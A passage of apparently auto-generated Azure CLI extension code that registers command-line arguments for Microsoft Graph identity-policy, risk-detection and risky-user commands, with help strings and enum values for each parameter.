with self.argument_context('identitysignins policy delete-token-lifetime-policy') as c:
c.argument('token_lifetime_policy_id', type=str, help='key: id of tokenLifetimePolicy')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins policy list-activity-based-timeout-policy') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy list-authorization-policy') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy list-claim-mapping-policy') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy list-conditional-access-policy') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy list-home-realm-discovery-policy') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy list-permission-grant-policy') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy list-private-link-resource-policy') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy list-token-issuance-policy') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy list-token-lifetime-policy') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy show-activity-based-timeout-policy') as c:
c.argument('activity_based_timeout_policy_id', type=str, help='key: id of activityBasedTimeoutPolicy')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy show-admin-consent-request-policy') as c:
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy show-authentication-flow-policy') as c:
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy show-authorization-policy') as c:
c.argument('authorization_policy_id', type=str, help='key: id of authorizationPolicy')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy show-b2-c-authentication-method-policy') as c:
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy show-claim-mapping-policy') as c:
c.argument('claims_mapping_policy_id', type=str, help='key: id of claimsMappingPolicy')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy show-conditional-access-policy') as c:
c.argument('conditional_access_policy_id', type=str, help='key: id of conditionalAccessPolicy')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy show-device-registration-policy') as c:
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy show-directory-role-access-review-policy') as c:
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy show-home-realm-discovery-policy') as c:
c.argument('home_realm_discovery_policy_id', type=str, help='key: id of homeRealmDiscoveryPolicy')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy show-identity-security-default-enforcement-policy') as c:
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy show-permission-grant-policy') as c:
c.argument('permission_grant_policy_id', type=str, help='key: id of permissionGrantPolicy')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy show-private-link-resource-policy') as c:
c.argument('private_link_resource_id', type=str, help='key: id of privateLinkResource')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy show-token-issuance-policy') as c:
c.argument('token_issuance_policy_id', type=str, help='key: id of tokenIssuancePolicy')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy show-token-lifetime-policy') as c:
c.argument('token_lifetime_policy_id', type=str, help='key: id of tokenLifetimePolicy')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy update-activity-based-timeout-policy') as c:
c.argument('activity_based_timeout_policy_id', type=str, help='key: id of activityBasedTimeoutPolicy')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('deleted_date_time', help='')
c.argument('description', type=str, help='Description for this policy.')
c.argument('display_name', type=str, help='Display name for this policy.')
c.argument('definition', nargs='+', help='A string collection containing a JSON string that defines the rules '
'and settings for a policy. The syntax for the definition differs for each derived policy type. '
'Required.')
c.argument('is_organization_default', arg_type=get_three_state_flag(), help='If set to true, activates this '
'policy. There can be many policies for the same policy type, but only one can be activated as the '
'organization default. Optional, default value is false.')
c.argument('applies_to', action=AddAppliesTo, nargs='+', help='')
with self.argument_context('identitysignins policy update-admin-consent-request-policy') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('is_enabled', arg_type=get_three_state_flag(), help='')
c.argument('notify_reviewers', arg_type=get_three_state_flag(), help='')
c.argument('reminders_enabled', arg_type=get_three_state_flag(), help='')
c.argument('request_duration_in_days', type=int, help='')
c.argument('reviewers', action=AddReviewers, nargs='+', help='')
c.argument('version', type=int, help='')
with self.argument_context('identitysignins policy update-authentication-flow-policy') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('description', type=str, help='')
c.argument('display_name', type=str, help='')
c.argument('is_enabled', arg_type=get_three_state_flag(), help='', arg_group='Self Service Sign Up')
with self.argument_context('identitysignins policy update-authorization-policy') as c:
c.argument('authorization_policy_id', type=str, help='key: id of authorizationPolicy')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('deleted_date_time', help='')
c.argument('description', type=str, help='Description for this policy.')
c.argument('display_name', type=str, help='Display name for this policy.')
c.argument('allowed_to_sign_up_email_based_subscriptions', arg_type=get_three_state_flag(), help='')
c.argument('allowed_to_use_sspr', arg_type=get_three_state_flag(), help='')
c.argument('allow_email_verified_users_to_join_organization', arg_type=get_three_state_flag(), help='')
c.argument('allow_invites_from', arg_type=get_enum_type(['none', 'adminsAndGuestInviters',
'adminsGuestInvitersAndAllMembers', 'everyone',
'unknownFutureValue']), help='')
c.argument('block_msol_power_shell', arg_type=get_three_state_flag(), help='')
c.argument('default_user_role_permissions', action=AddDefaultUserRolePermissions, nargs='+',
help='defaultUserRolePermissions')
c.argument('enabled_preview_features', nargs='+', help='')
c.argument('guest_user_role_id', help='')
c.argument('permission_grant_policy_ids_assigned_to_default_user_role', nargs='+', help='')
with self.argument_context('identitysignins policy update-b2-c-authentication-method-policy') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('is_email_password_authentication_enabled', arg_type=get_three_state_flag(), help='')
c.argument('is_phone_one_time_password_authentication_enabled', arg_type=get_three_state_flag(), help='')
c.argument('is_user_name_authentication_enabled', arg_type=get_three_state_flag(), help='')
with self.argument_context('identitysignins policy update-claim-mapping-policy') as c:
c.argument('claims_mapping_policy_id', type=str, help='key: id of claimsMappingPolicy')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('deleted_date_time', help='')
c.argument('description', type=str, help='Description for this policy.')
c.argument('display_name', type=str, help='Display name for this policy.')
c.argument('definition', nargs='+', help='A string collection containing a JSON string that defines the rules '
'and settings for a policy. The syntax for the definition differs for each derived policy type. '
'Required.')
c.argument('is_organization_default', arg_type=get_three_state_flag(), help='If set to true, activates this '
'policy. There can be many policies for the same policy type, but only one can be activated as the '
'organization default. Optional, default value is false.')
c.argument('applies_to', action=AddAppliesTo, nargs='+', help='')
with self.argument_context('identitysignins policy update-conditional-access-policy') as c:
c.argument('conditional_access_policy_id', type=str, help='key: id of conditionalAccessPolicy')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('created_date_time', help='The Timestamp type represents date and time information using ISO 8601 '
'format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '
'\'2014-01-01T00:00:00Z\'. Readonly.')
c.argument('description', type=str, help='')
c.argument('display_name', type=str, help='Specifies a display name for the conditionalAccessPolicy object.')
c.argument('grant_controls', action=AddGrantControls, nargs='+', help='conditionalAccessGrantControls')
c.argument('modified_date_time', help='The Timestamp type represents date and time information using ISO 8601 '
'format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '
'\'2014-01-01T00:00:00Z\'. Readonly.')
c.argument('state', arg_type=get_enum_type(['enabled', 'disabled', 'enabledForReportingButNotEnforced']),
help='')
c.argument('application_enforced_restrictions', action=AddApplicationEnforcedRestrictions, nargs='+',
help='applicationEnforcedRestrictionsSessionControl', arg_group='Session Controls')
c.argument('cloud_app_security', action=AddCloudAppSecurity, nargs='+', help='cloudAppSecuritySessionControl',
arg_group='Session Controls')
c.argument('persistent_browser', action=AddPersistentBrowser, nargs='+',
help='persistentBrowserSessionControl', arg_group='Session Controls')
c.argument('sign_in_frequency', action=AddSignInFrequency, nargs='+', help='signInFrequencySessionControl',
arg_group='Session Controls')
c.argument('applications', action=AddApplications, nargs='+', help='conditionalAccessApplications',
arg_group='Conditions')
c.argument('client_applications', action=AddClientApplications, nargs='+',
help='conditionalAccessClientApplications', arg_group='Conditions')
c.argument('client_app_types', nargs='+', help='Client application types included in the policy. Possible '
'values are: all, browser, mobileAppsAndDesktopClients, exchangeActiveSync, easSupported, other.',
arg_group='Conditions')
c.argument('devices', action=AddDevices, nargs='+', help='conditionalAccessDevices', arg_group='Conditions')
c.argument('device_states', action=AddDeviceStates, nargs='+', help='conditionalAccessDeviceStates',
arg_group='Conditions')
c.argument('locations', action=AddLocations, nargs='+', help='conditionalAccessLocations',
arg_group='Conditions')
c.argument('platforms', action=AddPlatforms, nargs='+', help='conditionalAccessPlatforms',
arg_group='Conditions')
c.argument('sign_in_risk_levels', nargs='+', help='Risk levels included in the policy. Possible values are: '
'low, medium, high, none.', arg_group='Conditions')
c.argument('user_risk_levels', nargs='+', help='', arg_group='Conditions')
c.argument('users', action=AddUsers, nargs='+', help='conditionalAccessUsers', arg_group='Conditions')
with self.argument_context('identitysignins policy update-device-registration-policy') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('identitysignins policy update-directory-role-access-review-policy') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('apply_actions', action=AddApplyActions, nargs='+', help=' Expect value: KEY1=VALUE1 KEY2=VALUE2 '
'...', arg_group='Settings')
c.argument('auto_apply_decisions_enabled', arg_type=get_three_state_flag(), help='', arg_group='Settings')
c.argument('default_decision', type=str, help='', arg_group='Settings')
c.argument('default_decision_enabled', arg_type=get_three_state_flag(), help='', arg_group='Settings')
c.argument('instance_duration_in_days', type=int, help='', arg_group='Settings')
c.argument('justification_required_on_approval', arg_type=get_three_state_flag(), help='',
arg_group='Settings')
c.argument('mail_notifications_enabled', arg_type=get_three_state_flag(), help='', arg_group='Settings')
c.argument('recommendations_enabled', arg_type=get_three_state_flag(), help='', arg_group='Settings')
c.argument('recurrence', type=validate_file_or_dict, help='patternedRecurrence Expected value: '
'json-string/@json-file.', arg_group='Settings')
c.argument('reminder_notifications_enabled', arg_type=get_three_state_flag(), help='', arg_group='Settings')
with self.argument_context('identitysignins policy update-home-realm-discovery-policy') as c:
c.argument('home_realm_discovery_policy_id', type=str, help='key: id of homeRealmDiscoveryPolicy')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('deleted_date_time', help='')
c.argument('description', type=str, help='Description for this policy.')
c.argument('display_name', type=str, help='Display name for this policy.')
c.argument('definition', nargs='+', help='A string collection containing a JSON string that defines the rules '
'and settings for a policy. The syntax for the definition differs for each derived policy type. '
'Required.')
c.argument('is_organization_default', arg_type=get_three_state_flag(), help='If set to true, activates this '
'policy. There can be many policies for the same policy type, but only one can be activated as the '
'organization default. Optional, default value is false.')
c.argument('applies_to', action=AddAppliesTo, nargs='+', help='')
with self.argument_context('identitysignins policy update-identity-security-default-enforcement-policy') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('deleted_date_time', help='')
c.argument('description', type=str, help='Description for this policy.')
c.argument('display_name', type=str, help='Display name for this policy.')
c.argument('is_enabled', arg_type=get_three_state_flag(), help='If set to true, Azure Active Directory '
'security defaults is enabled for the tenant.')
with self.argument_context('identitysignins policy update-permission-grant-policy') as c:
c.argument('permission_grant_policy_id', type=str, help='key: id of permissionGrantPolicy')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('deleted_date_time', help='')
c.argument('description', type=str, help='Description for this policy.')
c.argument('display_name', type=str, help='Display name for this policy.')
c.argument('excludes', action=AddExcludes, nargs='+', help='')
c.argument('includes', action=AddIncludes, nargs='+', help='')
with self.argument_context('identitysignins policy update-private-link-resource-policy') as c:
c.argument('private_link_resource_id', type=str, help='key: id of privateLinkResource')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('allowed_tenant_ids', nargs='+', help='')
c.argument('arm_resource_id', type=str, help='')
with self.argument_context('identitysignins policy update-token-issuance-policy') as c:
c.argument('token_issuance_policy_id', type=str, help='key: id of tokenIssuancePolicy')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('deleted_date_time', help='')
c.argument('description', type=str, help='Description for this policy.')
c.argument('display_name', type=str, help='Display name for this policy.')
c.argument('definition', nargs='+', help='A string collection containing a JSON string that defines the rules '
'and settings for a policy. The syntax for the definition differs for each derived policy type. '
'Required.')
c.argument('is_organization_default', arg_type=get_three_state_flag(), help='If set to true, activates this '
'policy. There can be many policies for the same policy type, but only one can be activated as the '
'organization default. Optional, default value is false.')
c.argument('applies_to', action=AddAppliesTo, nargs='+', help='')
with self.argument_context('identitysignins policy update-token-lifetime-policy') as c:
c.argument('token_lifetime_policy_id', type=str, help='key: id of tokenLifetimePolicy')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('deleted_date_time', help='')
c.argument('description', type=str, help='Description for this policy.')
c.argument('display_name', type=str, help='Display name for this policy.')
c.argument('definition', nargs='+', help='A string collection containing a JSON string that defines the rules '
'and settings for a policy. The syntax for the definition differs for each derived policy type. '
'Required.')
c.argument('is_organization_default', arg_type=get_three_state_flag(), help='If set to true, activates this '
'policy. There can be many policies for the same policy type, but only one can be activated as the '
'organization default. Optional, default value is false.')
c.argument('applies_to', action=AddAppliesTo, nargs='+', help='')
with self.argument_context('identitysignins policy-permission-grant-policy create-exclude') as c:
c.argument('permission_grant_policy_id', type=str, help='key: id of permissionGrantPolicy')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('client_application_ids', nargs='+', help='')
c.argument('client_application_publisher_ids', nargs='+', help='')
c.argument('client_applications_from_verified_publisher_only', arg_type=get_three_state_flag(), help='')
c.argument('client_application_tenant_ids', nargs='+', help='')
c.argument('permission_classification', type=str, help='')
c.argument('permissions', nargs='+', help='')
c.argument('permission_type', arg_type=get_enum_type(['application', 'delegated', 'delegatedUserConsentable']),
help='')
c.argument('resource_application', type=str, help='')
with self.argument_context('identitysignins policy-permission-grant-policy create-include') as c:
c.argument('permission_grant_policy_id', type=str, help='key: id of permissionGrantPolicy')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('client_application_ids', nargs='+', help='')
c.argument('client_application_publisher_ids', nargs='+', help='')
c.argument('client_applications_from_verified_publisher_only', arg_type=get_three_state_flag(), help='')
c.argument('client_application_tenant_ids', nargs='+', help='')
c.argument('permission_classification', type=str, help='')
c.argument('permissions', nargs='+', help='')
c.argument('permission_type', arg_type=get_enum_type(['application', 'delegated', 'delegatedUserConsentable']),
help='')
c.argument('resource_application', type=str, help='')
with self.argument_context('identitysignins policy-permission-grant-policy delete-exclude') as c:
c.argument('permission_grant_policy_id', type=str, help='key: id of permissionGrantPolicy')
c.argument('permission_grant_condition_set_id', type=str, help='key: id of permissionGrantConditionSet')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins policy-permission-grant-policy delete-include') as c:
c.argument('permission_grant_policy_id', type=str, help='key: id of permissionGrantPolicy')
c.argument('permission_grant_condition_set_id', type=str, help='key: id of permissionGrantConditionSet')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins policy-permission-grant-policy list-exclude') as c:
c.argument('permission_grant_policy_id', type=str, help='key: id of permissionGrantPolicy')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy-permission-grant-policy list-include') as c:
c.argument('permission_grant_policy_id', type=str, help='key: id of permissionGrantPolicy')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy-permission-grant-policy show-exclude') as c:
c.argument('permission_grant_policy_id', type=str, help='key: id of permissionGrantPolicy')
c.argument('permission_grant_condition_set_id', type=str, help='key: id of permissionGrantConditionSet')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy-permission-grant-policy show-include') as c:
c.argument('permission_grant_policy_id', type=str, help='key: id of permissionGrantPolicy')
c.argument('permission_grant_condition_set_id', type=str, help='key: id of permissionGrantConditionSet')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy-permission-grant-policy update-exclude') as c:
c.argument('permission_grant_policy_id', type=str, help='key: id of permissionGrantPolicy')
c.argument('permission_grant_condition_set_id', type=str, help='key: id of permissionGrantConditionSet')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('client_application_ids', nargs='+', help='')
c.argument('client_application_publisher_ids', nargs='+', help='')
c.argument('client_applications_from_verified_publisher_only', arg_type=get_three_state_flag(), help='')
c.argument('client_application_tenant_ids', nargs='+', help='')
c.argument('permission_classification', type=str, help='')
c.argument('permissions', nargs='+', help='')
c.argument('permission_type', arg_type=get_enum_type(['application', 'delegated', 'delegatedUserConsentable']),
help='')
c.argument('resource_application', type=str, help='')
with self.argument_context('identitysignins policy-permission-grant-policy update-include') as c:
c.argument('permission_grant_policy_id', type=str, help='key: id of permissionGrantPolicy')
c.argument('permission_grant_condition_set_id', type=str, help='key: id of permissionGrantConditionSet')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('client_application_ids', nargs='+', help='')
c.argument('client_application_publisher_ids', nargs='+', help='')
c.argument('client_applications_from_verified_publisher_only', arg_type=get_three_state_flag(), help='')
c.argument('client_application_tenant_ids', nargs='+', help='')
c.argument('permission_classification', type=str, help='')
c.argument('permissions', nargs='+', help='')
c.argument('permission_type', arg_type=get_enum_type(['application', 'delegated', 'delegatedUserConsentable']),
help='')
c.argument('resource_application', type=str, help='')
with self.argument_context('identitysignins risk-detection-risk-detection create-risk-detection') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('activity', arg_type=get_enum_type(['signin', 'user', 'unknownFutureValue']), help='')
c.argument('activity_date_time', help='Date and time that the risky activity occurred.')
c.argument('additional_info', type=str, help='Additional information associated with the risk detection in '
'JSON format.')
c.argument('correlation_id', type=str, help='Correlation ID of the sign-in associated with the risk detection. '
'This property is null if the risk detection is not associated with a sign-in.')
c.argument('detected_date_time', help='Date and time that the risk was detected.')
c.argument('detection_timing_type', arg_type=get_enum_type(['notDefined', 'realtime', 'nearRealtime',
'offline', 'unknownFutureValue']), help='')
c.argument('ip_address', type=str, help='Provides the IP address of the client from where the risk occurred.')
c.argument('last_updated_date_time', help='Date and time that the risk detection was last updated.')
c.argument('request_id', type=str, help='Request ID of the sign-in associated with the risk detection. This '
'property is null if the risk detection is not associated with a sign-in.')
c.argument('risk_detail', arg_type=get_enum_type(['none', 'adminGeneratedTemporaryPassword',
'userPerformedSecuredPasswordChange',
'userPerformedSecuredPasswordReset',
'adminConfirmedSigninSafe', 'aiConfirmedSigninSafe',
'userPassedMFADrivenByRiskBasedPolicy',
'adminDismissedAllRiskForUser',
'adminConfirmedSigninCompromised', 'hidden',
'adminConfirmedUserCompromised', 'unknownFutureValue']),
help='')
c.argument('risk_event_type', type=str, help='The type of risk event detected. The possible values are '
'unlikelyTravel, anonymizedIPAddress, maliciousIPAddress, unfamiliarFeatures, '
'malwareInfectedIPAddress, suspiciousIPAddress, leakedCredentials, investigationsThreatIntelligence,'
' genericadminConfirmedUserCompromised, mcasImpossibleTravel, mcasSuspiciousInboxManipulationRules, '
'investigationsThreatIntelligenceSigninLinked, maliciousIPAddressValidCredentialsBlockedIP, and '
'unknownFutureValue. If the risk detection is a premium detection, will show generic')
c.argument('risk_level', arg_type=get_enum_type(['low', 'medium', 'high', 'hidden', 'none',
'unknownFutureValue']), help='')
c.argument('risk_state', arg_type=get_enum_type(['none', 'confirmedSafe', 'remediated', 'dismissed', 'atRisk',
'confirmedCompromised', 'unknownFutureValue']), help='')
c.argument('risk_type', arg_type=get_enum_type(['unlikelyTravel', 'anonymizedIPAddress', 'maliciousIPAddress',
'unfamiliarFeatures', 'malwareInfectedIPAddress',
'suspiciousIPAddress', 'leakedCredentials',
'investigationsThreatIntelligence', 'generic',
'adminConfirmedUserCompromised', 'mcasImpossibleTravel',
'mcasSuspiciousInboxManipulationRules',
'investigationsThreatIntelligenceSigninLinked',
'maliciousIPAddressValidCredentialsBlockedIP',
'unknownFutureValue']), help='')
c.argument('source', type=str, help='Source of the risk detection. For example, \'activeDirectory\'.')
c.argument('token_issuer_type', arg_type=get_enum_type(['AzureAD', 'ADFederationServices',
'UnknownFutureValue']), help='')
c.argument('user_display_name', type=str, help='The user principal name (UPN) of the user.')
c.argument('user_id', type=str, help='Unique ID of the user.')
c.argument('user_principal_name', type=str, help='The user principal name (UPN) of the user.')
c.argument('city', type=str, help='Provides the city where the sign-in originated. This is calculated using '
'latitude/longitude information from the sign-in activity.', arg_group='Location')
c.argument('country_or_region', type=str, help='Provides the country code info (2 letter code) where the '
'sign-in originated. This is calculated using latitude/longitude information from the sign-in '
'activity.', arg_group='Location')
c.argument('geo_coordinates', action=AddGeoCoordinates, nargs='+', help='geoCoordinates',
arg_group='Location')
c.argument('state', type=str, help='Provides the State where the sign-in originated. This is calculated using '
'latitude/longitude information from the sign-in activity.', arg_group='Location')
with self.argument_context('identitysignins risk-detection-risk-detection delete-risk-detection') as c:
c.argument('risk_detection_id', type=str, help='key: id of riskDetection')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins risk-detection-risk-detection list-risk-detection') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins risk-detection-risk-detection show-risk-detection') as c:
c.argument('risk_detection_id', type=str, help='key: id of riskDetection')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins risk-detection-risk-detection update-risk-detection') as c:
c.argument('risk_detection_id', type=str, help='key: id of riskDetection')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('activity', arg_type=get_enum_type(['signin', 'user', 'unknownFutureValue']), help='')
c.argument('activity_date_time', help='Date and time that the risky activity occurred.')
c.argument('additional_info', type=str, help='Additional information associated with the risk detection in '
'JSON format.')
c.argument('correlation_id', type=str, help='Correlation ID of the sign-in associated with the risk detection. '
'This property is null if the risk detection is not associated with a sign-in.')
c.argument('detected_date_time', help='Date and time that the risk was detected.')
c.argument('detection_timing_type', arg_type=get_enum_type(['notDefined', 'realtime', 'nearRealtime',
'offline', 'unknownFutureValue']), help='')
c.argument('ip_address', type=str, help='Provides the IP address of the client from where the risk occurred.')
c.argument('last_updated_date_time', help='Date and time that the risk detection was last updated.')
c.argument('request_id', type=str, help='Request ID of the sign-in associated with the risk detection. This '
'property is null if the risk detection is not associated with a sign-in.')
c.argument('risk_detail', arg_type=get_enum_type(['none', 'adminGeneratedTemporaryPassword',
'userPerformedSecuredPasswordChange',
'userPerformedSecuredPasswordReset',
'adminConfirmedSigninSafe', 'aiConfirmedSigninSafe',
'userPassedMFADrivenByRiskBasedPolicy',
'adminDismissedAllRiskForUser',
'adminConfirmedSigninCompromised', 'hidden',
'adminConfirmedUserCompromised', 'unknownFutureValue']),
help='')
c.argument('risk_event_type', type=str, help='The type of risk event detected. The possible values are '
'unlikelyTravel, anonymizedIPAddress, maliciousIPAddress, unfamiliarFeatures, '
'malwareInfectedIPAddress, suspiciousIPAddress, leakedCredentials, investigationsThreatIntelligence,'
' genericadminConfirmedUserCompromised, mcasImpossibleTravel, mcasSuspiciousInboxManipulationRules, '
'investigationsThreatIntelligenceSigninLinked, maliciousIPAddressValidCredentialsBlockedIP, and '
'unknownFutureValue. If the risk detection is a premium detection, will show generic')
c.argument('risk_level', arg_type=get_enum_type(['low', 'medium', 'high', 'hidden', 'none',
'unknownFutureValue']), help='')
c.argument('risk_state', arg_type=get_enum_type(['none', 'confirmedSafe', 'remediated', 'dismissed', 'atRisk',
'confirmedCompromised', 'unknownFutureValue']), help='')
c.argument('risk_type', arg_type=get_enum_type(['unlikelyTravel', 'anonymizedIPAddress', 'maliciousIPAddress',
'unfamiliarFeatures', 'malwareInfectedIPAddress',
'suspiciousIPAddress', 'leakedCredentials',
'investigationsThreatIntelligence', 'generic',
'adminConfirmedUserCompromised', 'mcasImpossibleTravel',
'mcasSuspiciousInboxManipulationRules',
'investigationsThreatIntelligenceSigninLinked',
'maliciousIPAddressValidCredentialsBlockedIP',
'unknownFutureValue']), help='')
c.argument('source', type=str, help='Source of the risk detection. For example, \'activeDirectory\'.')
c.argument('token_issuer_type', arg_type=get_enum_type(['AzureAD', 'ADFederationServices',
'UnknownFutureValue']), help='')
c.argument('user_display_name', type=str, help='The user principal name (UPN) of the user.')
c.argument('user_id', type=str, help='Unique ID of the user.')
c.argument('user_principal_name', type=str, help='The user principal name (UPN) of the user.')
c.argument('city', type=str, help='Provides the city where the sign-in originated. This is calculated using '
'latitude/longitude information from the sign-in activity.', arg_group='Location')
c.argument('country_or_region', type=str, help='Provides the country code info (2 letter code) where the '
'sign-in originated. This is calculated using latitude/longitude information from the sign-in '
'activity.', arg_group='Location')
c.argument('geo_coordinates', action=AddGeoCoordinates, nargs='+', help='geoCoordinates',
arg_group='Location')
c.argument('state', type=str, help='Provides the State where the sign-in originated. This is calculated using '
'latitude/longitude information from the sign-in activity.', arg_group='Location')
with self.argument_context('identitysignins risky-user-risky-user create-risky-user') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('is_deleted', arg_type=get_three_state_flag(), help='Indicates whether the user is deleted. '
'Possible values are: true, false')
c.argument('is_processing', arg_type=get_three_state_flag(), help='Indicates wehther a user\'s risky state is '
'being processed by the backend')
c.argument('risk_detail', arg_type=get_enum_type(['none', 'adminGeneratedTemporaryPassword',
'userPerformedSecuredPasswordChange',
'userPerformedSecuredPasswordReset',
'adminConfirmedSigninSafe', 'aiConfirmedSigninSafe',
'userPassedMFADrivenByRiskBasedPolicy',
'adminDismissedAllRiskForUser',
'adminConfirmedSigninCompromised', 'hidden',
'adminConfirmedUserCompromised', 'unknownFutureValue']),
help='')
c.argument('risk_last_updated_date_time', help='The date and time that the risky user was last updated.')
c.argument('risk_level', arg_type=get_enum_type(['low', 'medium', 'high', 'hidden', 'none',
'unknownFutureValue']), help='')
c.argument('risk_state', arg_type=get_enum_type(['none', 'confirmedSafe', 'remediated', 'dismissed', 'atRisk',
'confirmedCompromised', 'unknownFutureValue']), help='')
c.argument('user_display_name', type=str, help='Risky user display name.')
c.argument('user_principal_name', type=str, help='Risky user principal name.')
c.argument('history', type=validate_file_or_dict, help='The activity related to user risk level change '
'Expected value: json-string/@json-file.')
with self.argument_context('identitysignins risky-user-risky-user delete-risky-user') as c:
c.argument('risky_user_id', type=str, help='key: id of riskyUser')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins risky-user-risky-user list-risky-user') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins risky-user-risky-user show-risky-user') as c:
c.argument('risky_user_id', type=str, help='key: id of riskyUser')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins risky-user-risky-user update-risky-user') as c:
c.argument('risky_user_id', type=str, help='key: id of riskyUser')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('is_deleted', arg_type=get_three_state_flag(), help='Indicates whether the user is deleted. '
